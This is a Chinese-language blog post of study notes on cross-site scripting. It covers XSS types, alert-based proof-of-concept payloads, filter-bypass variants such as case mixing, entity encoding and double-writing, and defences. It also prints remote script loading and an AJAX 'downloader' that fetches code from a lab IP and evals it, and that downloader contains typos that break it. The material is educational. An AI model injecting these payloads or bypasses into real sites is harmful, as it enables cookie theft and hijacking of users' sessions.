<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.0.2">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/180x180.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/16x16.png">
  <link rel="mask-icon" href="/images/logo2.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"xinkjung.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"hide","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>


<!--

-->

  <meta name="description" content="《网络安全》学习之XSS - Shellcode">
<meta property="og:type" content="article">
<meta property="og:title" content="《网络安全》学习之XSS">
<meta property="og:url" content="https://xinkjung.github.io/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/index.html">
<meta property="og:site_name" content="xinkjung">
<meta property="og:description" content="《网络安全》学习之XSS - Shellcode">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-08-28T09:04:27.000Z">
<meta property="article:modified_time" content="2020-09-02T12:10:23.367Z">
<meta property="article:author" content="xxx">
<meta property="article:tag" content="网络安全">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="Shellcode">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://xinkjung.github.io/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>《网络安全》学习之XSS | xinkjung</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">xinkjung</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://xinkjung.github.io/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="xxx">
      <meta itemprop="description" content="Just be happy.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xinkjung">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          《网络安全》学习之XSS
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-08-28 17:04:27" itemprop="dateCreated datePublished" datetime="2020-08-28T17:04:27+08:00">2020-08-28</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-09-02 20:10:23" itemprop="dateModified" datetime="2020-09-02T20:10:23+08:00">2020-09-02</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">《网络安全》学习之XSS - Shellcode</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>XSS作为OWASP TOP 10之一，被称为跨站脚本攻击(Cross-site scripting)，本来应该缩写为CSS，但是由于和CSS(Cascading Style Sheets，层叠样式脚本)重名，所以更名为XSS。<br>主要基于javascript完成恶意的攻击行为，js可以非常灵活的操作html、css和浏览器，这就使得XSS攻击的“想象”空间特别大。<br>XSS通过将精心构造的代码（javascript）注入到网页中，并由浏览器解释运行这段代码以达到恶意攻击的效果。当用户访问被XSS脚本注入的网页，XSS脚本就会被提取出来，用户浏览器就会解析这段XSS代码，也就是说这时用户将被攻击了。用户最简单的动作解释使用浏览器上网，并且浏览器中有javascript解释器可以解析javascript，然而浏览器并不会判断代码是否恶意，即XSS的对象是用户和浏览器。<br>微博、浏览版、聊天室等收集用户输入的地方都有可能被注入XSS代码，都存在遭受XSS的风险，只要没有对用户的输入进行严格过滤就会被XSS。</p>
<h2 id="XSS危害"><a href="#XSS危害" class="headerlink" title="XSS危害"></a>XSS危害</h2><p>XSS利用JS代码实现攻击，有很多种攻击方法，以下简单列出几种：</p>
<ul>
<li>盗取各种用户账号</li>
<li>窃取用户cookie资料，冒充用户身份进入网站</li>
<li>劫持用户会话，执行任意操作</li>
<li>刷流量，执行弹窗广告</li>
<li>传播蠕虫病毒</li>
</ul>
<h2 id="XSS漏洞的验证"><a href="#XSS漏洞的验证" class="headerlink" title="XSS漏洞的验证"></a>XSS漏洞的验证</h2><p>我们可以用一段简单的代码，验证和检测漏洞的存在，这样的代码叫做PoC(Proof of Concept)。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">POC                    &#x2F;&#x2F; 漏洞的验证与检测</span><br><span class="line">EXP                    &#x2F;&#x2F; 漏洞的完整利用工具</span><br><span class="line">shellcode              &#x2F;&#x2F; 利用漏洞时，所执行的代码</span><br><span class="line">payload                &#x2F;&#x2F; 攻击载荷</span><br><span class="line">                       sqlmap                  &#x2F;&#x2F; 攻击代码的模版</span><br><span class="line">                       msf                     &#x2F;&#x2F; shellcode类似，功能是建立与目标的连接</span><br></pre></td></tr></table></figure>
<p>验证XSS漏洞存在的PoC如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(&#x2F;xss&#x2F;)&lt;&#x2F;script&gt;       &#x2F;&#x2F; 常用</span><br><span class="line">&lt;script&gt;confirm(&#39;xss&#39;)&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;prompt(&#39;xss&#39;)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
<p>我们可以在测试页面中提交这样的代码（以上任意一行），我们发现提交的代码会被当作字符串输出在html页面中，浏览器会根据<code>script</code>标签识别为javascript语句并执行，就能看到弹窗操作，也就是说可以执行其他js代码，因此我们验证了XSS漏洞的存在性。</p>
<h2 id="XSS的分类"><a href="#XSS的分类" class="headerlink" title="XSS的分类"></a>XSS的分类</h2><p>大概可以分为三类：反射型XSS、存储型XSS、DOM型XSS。</p>
<ul>
<li>反射型XSS<br>是非持久性、参数型的跨站脚本，反射型XSS的js代码在web应用的参数（变量）中。<br>如搜索框的反射型XSS，在搜索框中提交PoC<code>&lt;script&gt;alert(/xss/)&lt;/script&gt;</code>，点击搜索，即可触发反射型XSS。可以注意到我们提交的poc会出现在search.php页面的keywords参数中。</li>
<li>存储型XSS<br>是持久性跨站脚本，持久体现在XSS代码不是在某个参数（变量）中，而是写进数据库或文件等可以永久保存数据的介质中。<br>存储型XSS通常发生在留言板等地方，我们在留言板位置留言，将恶意代码写进数据库中。这只是第一步，因为XSS使用等js代码运行环境是浏览器，所以要浏览器从服务器载入恶意XSS代码时才能真正触发XSS。这时我们需要模拟网站后台管理员的身份查看留言，就能触发XSS了。</li>
<li>DOM型XSS<br>比较特殊，是一种XSS攻击，其中攻击的payload由于修改受害者浏览器页面的DOM树而执行的。其特殊地方就是payload在浏览器本地修改DOM树而并不会传到服务器上执行，这也就使得DOM型XSS比较难以检测。<br>如例子<code>#message=&lt;script&gt;alert(/xss/)&lt;/script&gt;</code>，我们以锚点点方式提交PoC。PoC并不会发送给服务器，但是已经触发了XSS，查看提交参数后的html页面（DOM树）会形成鲜明的对比。</li>
</ul>
<h2 id="XSS的构造"><a href="#XSS的构造" class="headerlink" title="XSS的构造"></a>XSS的构造</h2><ol>
<li>利用<code>&lt;&gt;</code>构造html/javascript<br>可以利用<code>&lt;&gt;</code>构造<code>html</code>标签或<code>&lt;script&gt;</code>标签。<br>在测试页面提交参数<code>&lt;h1 style=&#39;color:red&#39;&gt;利用&lt;&gt;构造html/js&lt;/h1&gt;</code>或提交<code>&lt;script&gt;alert(/xss/)&lt;/script&gt;</code></li>
<li>伪协议<br>也可以使用javascript：伪协议的方式构造XSS。<br>提交参数<code>&lt;a href=&quot;javascript:alert(/xss/)&quot;&gt;touch me!&lt;/a&gt;</code>，然后点击超链接即可触发XSS。或使用<code>img</code>标签的伪协议（但是这种方法在IE6下测试成功）<code>&lt;img src=&quot;javascript:alert(&#39;xss&#39;)&quot;&gt;</code>。</li>
<li>产生自己的事件<br>“事件驱动”是一种比较经典的编程思想，在网页中会发生很多事件（比如鼠标移动、键盘键入等），javascript可以对这些事件进行响应，所以我们可以通过事件触发js函数，触发XSS。<ul>
<li>事件种类<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">windows事件              对Windows对象触发的事件</span><br><span class="line">Form事件                 html表单内的动作触发事件</span><br><span class="line">Keyboard事件             键盘按键</span><br><span class="line">Mouse事件                由鼠标或类似用户动作触发的事件</span><br><span class="line">Media事件                由多媒体触发的事件</span><br></pre></td></tr></table></figure>
如<code>&lt;img src=&#39;./smile.jpg&#39; onmouseover=&#39;alert(/xss/)&#39;&gt;</code>，这个标签会引入一个图片，当鼠标悬停在图片上时会触发XSS代码。<br>单行文本框的键盘点击事件<code>&lt;input type=&quot;text&quot; onkeydown=&quot;alert(/xss/)&quot;&gt;</code>，当点击键盘任意一个按键的时候触发。<br><code>&lt;input type=&quot;text&quot; onkeyup=&quot;alert(/xss/)&quot;&gt;</code><br><code>&lt;input type=&quot;button&quot; onclick=&quot;alert(/xss/)&quot;&gt;</code><br><code>&lt;img src=&#39;#&#39; onerror=&#39;alert(/xss/)&#39;&gt;</code></li>
</ul>
</li>
<li>利用CSS跨站（old）<br>我们也可以利用CSS(层叠样式脚本)触发XSS，但是这种方法比较古老，基本不太适合现在主流的浏览器，我们可以稍作了解（以下代码均在IE6下测试）。<ul>
<li>行内样式<br>  <code>&lt;div style=&quot;background-image:url(javascript:alert(/xss/))&quot;&gt;</code></li>
<li>页内样式<br>  <code>&lt;style&gt;Body&#123;background-image:url(javascript:alert(/xss/))&#125;&lt;/style&gt;</code></li>
<li>外部样式<br>  <code>&lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;./xss.css&quot;&gt;&lt;div&gt;hello&lt;/div&gt;</code><br>  xss.css文件内容如下：  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">h1&#123;</span><br><span class="line">    color:red;</span><br><span class="line">&#125;</span><br><span class="line">div&#123;</span><br><span class="line">    &#x2F;* width:expression(alert(&#x2F;xss&#x2F;))*&#x2F;</span><br><span class="line">    background-image:url(javascript:alert(&#x2F;xss&#x2F;))</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
<li>expression<br>  <code>&lt;div style=&quot;width:expression(alert(/xss/))&quot;&gt;</code><br>  <code>&lt;style&gt;Body&#123;background-image:expression(alert(/xss/));&#125;&lt;/style&gt;</code></li>
<li>import<br>  <code>&lt;style&gt;@import &#39;javascript:alert(&quot;xss&quot;)&#39;;&lt;/style&gt;</code><br>  <code>&lt;style type=&quot;text/css&quot;&gt;@import url(xss.css);&lt;/style&gt;&lt;div&gt;xxx&lt;/div&gt;</code></li>
</ul>
</li>
<li>其他标签以及手法<br>我们也可以用其他标签触发XSS<br><code>&lt;svg onload=&quot;alert(/xss/)&quot;&gt;</code>这个语句还是比较简洁的。<br><code>&lt;input onfocus=alert(/xss/) autofocus&gt;</code></li>
</ol>
<h2 id="XSS的变形"><a href="#XSS的变形" class="headerlink" title="XSS的变形"></a>XSS的变形</h2><p>我们可以构造XSS进行各种变形，以绕过XSS过滤器的检测。变形方式主要有以下几种：</p>
<ol>
<li>大小写转换<br>可以将payload进行大小写转换，如下面两个例子：<br><code>&lt;Img sRc=&#39;#&#39; Onerror=&quot;alert(/xss/)&quot; /&gt;</code><br><code>&lt;a hREf=&quot;javaScript:alert(/xss/)&quot;&gt;click me&lt;/a&gt;</code></li>
<li>引号的使用<br>html语言中对引号的使用不敏感，但是某些过滤函数时“锱铢必较”<br><code>&lt;img src=&quot;#&quot; onerrpr=&quot;alert(/xss/)&quot; /&gt;</code><br><code>&lt;img src=&#39;#&#39; onerror=&#39;alert(/xss/)&#39; /&gt;</code><br><code>&lt;img src=# onerror=alert(/xss/) /&gt;</code></li>
<li><code>/</code>可以代替空格<br>我们还可以使用<code>/</code>左斜线代替空格<br><code>&lt;Img/src=&#39;#&#39;/Onerror=&#39;alert(/xss/)&#39; /&gt;</code></li>
<li>回车<br>我们可以在一些未知添加Tab(水平制表符)和回车符来绕过关键字检测。<br><code>&lt;Img/sRc=&#39;#&#39;/Onerror =&#39;alert(/xss/)&#39; /&gt;</code><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;A hREf&#x3D;&quot;j</span><br><span class="line">avascript:alert(&#x2F;xss&#x2F;)&quot;&gt;click me!&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure></li>
<li>对标签属性值进行转码<br>我们也可以对标签属性值进行转码来绕过过滤。对应编码如下：</li>
</ol>
<table>
<thead>
<tr>
<th align="center">字母</th>
<th align="center">ASCII码</th>
<th align="center">十进制编码</th>
<th align="center">十六进制编码</th>
</tr>
</thead>
<tbody><tr>
<td align="center">a</td>
<td align="center">97</td>
<td align="center">&#97;</td>
<td align="center">&#x61;</td>
</tr>
<tr>
<td align="center">e</td>
<td align="center">101</td>
<td align="center">&#101;</td>
<td align="center">&#x65;</td>
</tr>
</tbody></table>
<p>经过简单编码之后的样子：<code>&lt;A hREf=&quot;j&amp;#97;v&amp;#x61;script:alert(/xss/)&quot;&gt;click me!&lt;/a&gt;</code><br>另外我们可以将以下字符插入到任意位置</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Tab     &amp;#9</span><br><span class="line">换行     &amp;#10</span><br><span class="line">回车     &amp;#13</span><br></pre></td></tr></table></figure>
<p>可以将以下字符插入到头部位置：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">SOH     &amp;#01</span><br><span class="line">STX     &amp;#02</span><br></pre></td></tr></table></figure>
<p>经过编码后到样子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;A hREf&#x3D;&quot;&amp;#01;j&amp;#97;v&amp;#x61;s&amp;#9;c&amp;#10;r&amp;#13;ipt:alert(&#x2F;xss&#x2F;)&quot;&gt;</span><br><span class="line">click me!</span><br><span class="line">&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>

<ol start="6">
<li>拆分跨站<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;z&#x3D;&#39;alert&#39;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;z&#x3D;z+&#39;(&#x2F;xss&#x2F;)&#39;&lt;&#x2F;script&gt;</span><br><span class="line">&lt;script&gt;eval(z)&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure></li>
<li>双写绕过<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">&lt;scr&lt;script&gt;ipt&gt;</span><br></pre></td></tr></table></figure></li>
<li>CSS中的变形</li>
</ol>
<ul>
<li>使用全角字符<br><code>width:e x p r e s s i o n(alert(/xss/))</code></li>
<li>注释会被浏览器忽略<br><code>width:expr/*~*/ession(alert(/x~s~s/))</code></li>
<li>样式表中的<code>\</code>和<code>\0</code><br><code>&lt;style&gt;@import &#39;javasc/ri/0pt:alert(&quot;xss&quot;)&#39;;&lt;/style&gt;</code></li>
</ul>
<h2 id="Shellcode的调用"><a href="#Shellcode的调用" class="headerlink" title="Shellcode的调用"></a>Shellcode的调用</h2><p>Shellcode就是在利用漏洞所执行的代码。<br>完整的XSS攻击，会将shellcode存放在一定的地方，然后触发漏洞调用shellcode。</p>
<ul>
<li>远程调用JS<br>可以将js的代码单独放在一个js文件中，然后通过http协议远程加载该脚本。如<code>&lt;script src=&quot;http://172.16.132.138/XSS-TEST/normal/xss.js&quot;&gt;&lt;/script&gt;</code>，这是比较常用的方式。<br>‘XSS.js’内容如下：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">alert(&#39;xss.js&#39;);</span><br></pre></td></tr></table></figure></li>
<li>windows.location.hash<br>我们也可以使用js中windows.location.hash方法获取浏览器URL地址栏的XSS代码。这个方法或回去URL中<code>#</code>后面的内容。例如<code>http://domain.com/index.php#xxx</code>，windows.location.hash的值就是<code>xxx</code>。<br>所以我们可以构造以下代码直接提交到测试页面<code>xss.php</code>中：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?submit&#x3D;submit&amp;xsscode&#x3D;&lt;script&gt;eval(location.hash.substr(1))&lt;&#x2F;script&gt;#alert(&#x2F;This is windows.location.hash&#x2F;)</span><br></pre></td></tr></table></figure></li>
<li>XSS Downloader<br>XSS下载器就是将XSS代码写到网页中，然后通过AJAX技术获取网页中的XSS代码。<br>在使用XSS Downloader之前需要一个我们自己的页面<code>xss_downloader.php</code>，内容如下：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~~~~BOF|alert(&#x2F;xss&#x2F;)|EOF~~~~~~~~~~~~~~</span><br></pre></td></tr></table></figure>
常见下载器如下：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">function XSS()&#123;</span><br><span class="line">    if (window.XMLHttpRequest) &#123;</span><br><span class="line">        a &#x3D; new XMLHttpRequest();</span><br><span class="line">    &#125; else if (window.ActiveXObject) &#123;</span><br><span class="line">        a &#x3D; new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        return;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    a &#x3D; open(&#39;get&#39;, &#39;http:&#x2F;&#x2F;172.16.132.161&#x2F;XSS_TEST&#x2F;normal&#x2F;xss_downloader.php&#39;, false);</span><br><span class="line">    a.send();</span><br><span class="line">    b &#x3D; a.respondeText;</span><br><span class="line">    eval(unescape(b.substring(b.index0f(&#39;BOF|&#39;)+4, b.index0f(&#39;|EOF&#39;))));</span><br><span class="line">&#125;</span><br><span class="line">XSS();</span><br><span class="line">&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>
AJAX技术会收到浏览器同源策略的限制，而为了解决这个问题，我们需要在服务器代码中添加如下内容：<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">header(&#39;Access-Control-Allow-Origin: *&#39;);</span><br><span class="line">header(&#39;Access-Control_Allow-Headers: Origin, X-Requested-With, Content-Type, Accept&#39;);</span><br></pre></td></tr></table></figure></li>
<li>备选存储技术<br>我们可以把Shellcode存储在客户端的本地域中，比如HTTP Cookie、Flash共享对象、UserData、localStorage等。</li>
</ul>
<h2 id="XSS通关挑战"><a href="#XSS通关挑战" class="headerlink" title="XSS通关挑战"></a>XSS通关挑战</h2><p>是一个练习XSS绕过和展示各种XSS场景的靶机环境,推荐xss-labs。<br>这里找到一个在线的练习环境<a target="_blank" rel="noopener" href="http://xss-ctf.xiejiahe.com/">XSS-CTF</a>,只需要点击图片就可以开始挑战。</p>
<h2 id="XSS的防御"><a href="#XSS的防御" class="headerlink" title="XSS的防御"></a>XSS的防御</h2><ol>
<li>使用XSS Filter<br>其作用是过滤用户（客户端）提交的有害信息，从而达到防范XSS攻击的效果。<ul>
<li>输入过滤<br>“永远不要相信用户的输入”是网站开发的基本常识，对于用户输入一定要过滤，过滤再过滤。</li>
<li>输入验证<br>即对用户提交信息进行有效验证，仅接受指定长度范围内的，采用适当格式的内容提交，阻止或忽略除此之外的其他任何数据。<br>  输入是否仅包含合法的字符<br>  输入字符是否超过最大长度限制<br>  输入如果为数字，数字是否在指定的范围<br>  输入是否符合特殊的格式要求，如E-mail地址、IP地址等</li>
<li>数据消毒<br>过滤和精华掉有害的输入</li>
<li>输出编码<br>HTML编码主要是用对应的HTML实体代替字符</li>
<li>黑白名单<br>不管是采用输入过滤还是输出编码，都是针对数据信息进行黑｜白名单式的过滤<br>黑名单，非允许数据<br>白名单，允许的数据</li>
</ul>
</li>
</ol>
<h2 id="防御DOM-XSS"><a href="#防御DOM-XSS" class="headerlink" title="防御DOM-XSS"></a>防御DOM-XSS</h2><p>避免客户端文档重写、重定向或其他敏感操作。</p>

    </div>

    
    
    



      <div>
        
          <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">---------- 已经到最底部啦 <i class="fa fa-paw"></i> 感谢您的阅读 ----------</div>
    
</div>
        
      </div>
      

      <div>
        
          
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script src="https://cdn.bootcss.com/jquery/2.0.0/jquery.min.js"></script>
  <script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
  <p><span>本文标题:</span><a href="/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/">《网络安全》学习之XSS</a></p>
  <p><span>文章作者:</span><a href="/" title="访问xinkjung的个人博客">xinkjung</a></p>
  
  <p><span>发布时间:</span>2020年08月28日 - 17:04</p>
  <p><span>最后更新:</span>2020年09月02日 - 20:10</p>

  <p><span>原始链接:</span><a href="/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/" title="《网络安全》学习之XSS">https://xinkjung.github.io/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://xinkjung.github.io/2020/08/28/%E3%80%8A%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E3%80%8B%E5%AD%A6%E4%B9%A0%E4%B9%8BXSS/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    $(".fa-clipboard").click(function(){
      clipboard.on('success', function(){
        swal({   
          title: "",   
          text: '复制成功',
          icon: "success", 
          showConfirmButton: true
          });
  });
    });  
</script>

        
      </div>



      <footer class="post-footer">
          <div class="post-tags">
